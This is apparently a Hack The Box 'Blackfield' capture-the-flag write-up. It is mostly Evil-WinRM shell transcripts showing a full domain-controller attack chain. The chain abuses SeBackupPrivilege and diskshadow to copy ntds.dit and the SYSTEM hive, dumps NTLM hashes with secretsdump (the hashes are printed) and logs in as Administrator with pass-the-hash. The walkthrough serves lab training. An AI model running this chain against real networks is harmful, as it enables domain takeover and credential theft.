*Evil-WinRM* PS C:\Users\svc_backup\Documents> pwd
Path
----
C:\Users\svc_backup\Documents
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_backup> ls
Directory: C:\Users\svc_backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/23/2020 9:16 AM 3D Objects
d-r--- 2/23/2020 9:16 AM Contacts
d-r--- 2/28/2020 2:26 PM Desktop
d-r--- 6/19/2020 2:05 PM Documents
d-r--- 2/23/2020 9:16 AM Downloads
d-r--- 2/23/2020 9:16 AM Favorites
d-r--- 2/23/2020 9:16 AM Links
d-r--- 2/23/2020 9:16 AM Music
d----- 6/19/2020 8:53 AM ntds
d-r--- 2/23/2020 9:16 AM Pictures
d-r--- 2/23/2020 9:16 AM Saved Games
d-r--- 2/23/2020 9:16 AM Searches
d-r--- 2/23/2020 9:16 AM Videos
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/19/2020 4:16 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
a******************************6
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
Well done, go for the root. Ok, try to reach the root.txt file, but you will have a bad surprise. You'll find also an additional file near the root.txt, that provide you with some other information, but, I think that I have not used it.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-ar--- 6/19/2020 4:16 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type root.txt
+ ~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
Another interesting tool, used to enumerate and investigate from the inside of a windows machine, is the winPEAS tool, available as executable or batch file. Upload it on the remote machine using the upload command of the Evil-WinRM tool and launch it. I report as usual the only information that provides me with some useful information:
*Evil-WinRM* PS C:\temp\not-this> ./winPEAS.bat
*((,.,/((((((((((((((((((((/, */
,/*,..*(((((((((((((((((((((((((((((((((,
[...]
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]
It seems that with my current account I have these privileges. I concentrated on the SeBackupPrivilege, SeRestorePrivilege and SeIncreaseWorkingSetPrivilege. I can't find anything interesting for the last two, but the first one, give me some hope. Searching on google for "SeBackupPrivilege exploit":
Also in this case I lost a lot of hours to try and re-try it, because I cannot reach the outcome described on the description page, when finally I found the right sequence and commands to use on the target machine to reach the intent. But for first, upload the two library files on the remote machine:
*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeCmdLets.dll
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /data/SeBackupPrivilegeCmdLets.dll to C:\temp\not-this\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp\not-this> upload /data/SeBackupPrivilegeUtils.dll
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /data/SeBackupPrivilegeUtils.dll to C:\temp\not-this\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp\not-this> ls
Directory: C:\temp\not-this
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2020 4:20 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/20/2020 4:20 PM 16384 SeBackupPrivilegeUtils.dll
-a---- 6/20/2020 2:54 PM 32976 winPEAS.bat
I list here two other useful links that help me to understand the right way to achieve the elevation privileges. One of the links, come from the winPEAS analysis, about the specific privileges that report:
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_->[*] BASIC USER INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
The second one is an extension of the first, I reach when, investigating on the problem, I found, trying the exploits, understand that I haven't access to the file also using the backup features available to my credential.
The steps I'm going to describe are not useful to accomplish the hack, but it helped me to understand how to proceed and I'd like to explain it to you. Look at this...
*Evil-WinRM* PS C:\temp\not-this> whoami
blackfield\svc_backup
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> type c:\Users\Administrator\Desktop\root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.
At line:1 char:1
+ type c:\Users\Administrator\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator\Desktop\root.txt:String) [Get-Content], UnauthorizedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
You can see that I cannot reach the file, but I should have the right access to it. A confirm I have when I try to backup the file, but again, I cannot access to it:
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
Obviously, many of you, with plus experience, will be thinking that I am unable because that is not the correct way to use these commands ... okay, I accept criticism, I discovered it at my expense, but like many of others that read my articles, I am learning and I want to remember that I come from a past of developer and not of system.
The stranger thing that I didn't understand in the immediate is exposed by that sequence of instruction executed on the shell:
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner : BUILTIN\Administrators
Group : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:AI(A;;FA;;;LA)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)
*Evil-WinRM* PS C:\temp\not-this> $acl = get-acl c:\Users\Administrator\Desktop\root.txt
*Evil-WinRM* PS C:\temp\not-this> $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule('BLACKFIELD\svc_backup','FullControl','None','None','Allow')
*Evil-WinRM* PS C:\temp\not-this> $acl.AddAccessRule($permisoacl)
*Evil-WinRM* PS C:\temp\not-this> set-acl -Path c:\Users\Administrator\Desktop\root.txt -AclObject $acl
*Evil-WinRM* PS C:\temp\not-this> get-acl -path c:\Users\Administrator\Desktop\root.txt | fl
Path : Microsoft.PowerShell.Core\FileSystem::C:\Users\Administrator\Desktop\root.txt
Owner : BUILTIN\Administrators
Group : BLACKFIELD\Domain Users
Access : BLACKFIELD\Administrator Allow FullControl
BLACKFIELD\svc_backup Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BLACKFIELD\Administrator Allow FullControl
Audit :
Sddl : O:BAG:DUD:AI(A;;FA;;;LA)(A;;FA;;;S-1-5-21-4194615774-2175524697-3563712290-1413)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LA)
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\Users\Administrator\Desktop\root.txt .\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
As you can see, I have no access to the file in the beginning, but, after the hack, I have access, anyway, I cannot access the file. Same things happened when I found that article, about the ntds.dit file.
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
From now on, I start to concentrate on the ntds.dit file, searching on the internet for specific use-cases.
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "set context persistent nowriters" | out-file ./cmd -encoding ascii
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "add volume c: alias temp" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "create" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> echo "expose %temp% z:" | out-file ./cmd -encoding ascii -append
*Evil-WinRM* PS C:\temp\not-this\fhere> cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% z:
*Evil-WinRM* PS C:\temp\not-this\fhere> diskshadow.exe /s .\cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 6/21/2020 1:30:12 PM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {40b73fa4-0ba8-4c2b-a24e-870c35369800} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} set as environment variable.
Querying all shadow copies with the shadow copy set ID {2990c3a6-dcba-4515-9ceb-2f340f48ff3d}
* Shadow copy ID = {40b73fa4-0ba8-4c2b-a24e-870c35369800} %temp%
- Shadow copy set: {2990c3a6-dcba-4515-9ceb-2f340f48ff3d} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 6/21/2020 1:30:16 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {40b73fa4-0ba8-4c2b-a24e-870c35369800}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C:\temp\not-this\root.txt -Overwrite
Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ Copy-FileSeBackupPrivilege z:\users\administrator\desktop\root.txt C: ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
*Evil-WinRM* PS C:\temp\not-this\fhere> Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit .\ntds.dit
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
After a couple of days spent on these exploits, it seems that I am at a dead-end, but this last attempt, despite having given a negative result, inspires me more than the others, so I decided to restart the machine and rerun the whole process and finally...
*Evil-WinRM* PS C:\temp\not-this> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit .\ntds.dit -Overwrite
*Evil-WinRM* PS C:\temp\not-this> ls
Directory: C:\temp\not-this
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2020 2:19 PM 617 2020-06-21_14-19-33_DC01.cab
-a---- 6/21/2020 2:19 PM 86 cmd
-a---- 6/21/2020 2:20 PM 18874368 ntds.dit
-a---- 6/21/2020 2:15 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 6/21/2020 2:15 PM 16384 SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\temp\not-this> download ntds.dit /data/ntds.dit
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\temp\not-this\ntds.dit to /data/ntds.dit
Info: Download successful!
Ok, let's go for the final part, download it and export the registry section that allows us to decrypt the password as described in the tutorial linked before.
*Evil-WinRM* PS C:\temp\not-this> reg save hklm\system c:\temp\system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\temp\not-this> cd ..
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2020 2:20 PM not-this
-a---- 6/21/2020 2:26 PM 17387520 system.bak
*Evil-WinRM* PS C:\temp> download .\system.bak /data/system.bak
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\temp\.\system.bak to /data/system.bak
Info: Download successful!
Now, impacket will be our last tools again:
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system system.bak LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
[...]
BLACKFIELD.local\BLACKFIELD438814:1412:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
BLACKFIELD.local\lydericlefebvre:1414:aad3b435b51404eeaad3b435b51404ee:a2bc62c44415e12302885d742b0a6890:::
PC01$:1415:aad3b435b51404eeaad3b435b51404ee:de1e7748b6b292bfff4fd5adb54b4608:::
[...]
[*] Cleaning up...
I could try to crack the hash code of the administrator, but remember that Evil-WinRM is our best friend, with the capability to use a HASH to connect to the target machine, so...
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
8******************************b
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And so, also the root flag is mine. Thanks again, sorry if my practice to describe my fails, has extended this article, but I hope that you can learn from them!
That's all folks, see you next time!